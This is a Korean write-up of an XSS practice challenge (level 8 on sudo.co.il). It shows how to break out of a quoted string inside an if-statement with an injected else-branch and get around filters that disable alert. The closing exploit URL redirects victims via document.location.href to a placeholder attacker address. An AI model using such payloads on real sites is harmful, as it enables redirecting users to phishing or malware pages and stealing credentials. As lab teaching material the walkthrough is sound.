XSS Challenges 8

전단 계와는 다른 게 링크 태그 기능이 사용되고 있지 않은 것을 확인할 수 있습니다. 페이지 소스를 보면서 한번 확인해보겠습니다.

 

전 단계에서 사용한 코드를 삽입해본결과 기본적인 삽입 형태가 아닌 논리 연산자가 사용되고 있습니다.

 

고정 소스로 <script> 태그를 이용해 " b" 라는 임의 변수에 숫자 1을 선언했습니다. 그다음 조건문이 나오는데 if( b==2 ) b라는 변수가 숫자 2와 ==(같다면) --> { a= "" }로 넘어가고 있습니다.

 

조건식이 붙은 문제는 처음이라 조금 난처했습니다. b라는 변수에는 숫자 1로 고정 할당이 되어있는데 b == 2 와 동일해야지 a = 변수가 참이 되어 문장이 완성되기 때문입니다.

 

상단을 보시면 alert / prompt / confirm 같은 사용자와 상호작용 할수 있는 함수들이 재기능을 하지 못하도록 첫 문자열을 --> 대문자로 변경시켜 의미 없는 문자열을 만들고 있습니다.(javascript는 대. 소문자 구분)

 

우선 alert 를 사용하기 위해 여러 Encoding 기법과 confused(혼돈화) 그리고 "eval"를 통한 문자열을 불리해봐도 기능을 하지 못했습니다.

 

출제자의 의도와는 맞는것 같지 않아 조금 넓게 생각해봤습니다. 현재 고정 코드는 조건문이 붙어있고 우리의 코드는  b가 "2" 즉 참일 경우에 사용되는 영역에 들어가고 있기 때문에 "a" 변수에서 우선적으로 벗어나야 됩니다.

 

..
..

<script>
 b = 1
 if ( b == 2 ){ a = "Your_Payload"};
 </script>

..
..

<Input Code>
www.sudo.co.il/xss/level8.php?p=" }else{ "

<Output Code>
<script> b = 1 if ( b == 2 ){ a = "" }else{ "" }; </script>

a의 변수에 "(더블 쿼터)를 하나만 넣어 a = "" 변수를 마무리해주고 " } "를 통해 닫아주면 참일 경우의 코드 영역은 끝이 나게 됩니다.
if조건문의 경우 else(거짓) 또는 FALSE 도 함께 추가해주면 b ≠ 2 즉 b 가 2와 같지 않을 때의 문장을 읽어 들이게 됩니다.(b = 1 이 고정)

 

이제 기반은 다져 놨으니 팝업창을 실행하기만 하면 됩니다.

 

하지만 위에서 설명드렸다시피 사용자와 상호작용을 할만한 팝업창을 실행할 수 없었기에 조금 다른 방식으로 접근해 보았습니다.

 

document.location.href

href는 location 객체에 속해있는 프로퍼티로 현재 접속 중인 페이지 정보를 갖고 있습니다. 또한 값을 변경할 수 있는 프로퍼티이기 때문에 다른 페이지로 이동하는데도 사용되고 있습니다.

 

location.href="이동할 페이지 주소";

 

b의 값이 2가 아닌 것을 활용하여 else 문을 통해 document.location을 지정해주면 해당 링크를 접속한 사용자는 공격자가 지정해둔 경로로 자동 이동하게 됩니다.

 

즉 이동할 경로를 공격자의 악의적인 스크립트가 삽입된 경로로 이동시킴으로써 여러 필터링 검증을 우회할 수 있습니다.

 

이러한 방식을 통해 document.location으로 이동된 사용자의 로그인 정보를 탈취하거나 바이러스가 존재하는 페이지로 이동시키게 하는 등 여러 방법을 동원할 수 있습니다.

 

 

Exploit Code

www.sudo.co.il/xss/level8.php?p=" }else{document.location.href="attack.address"}//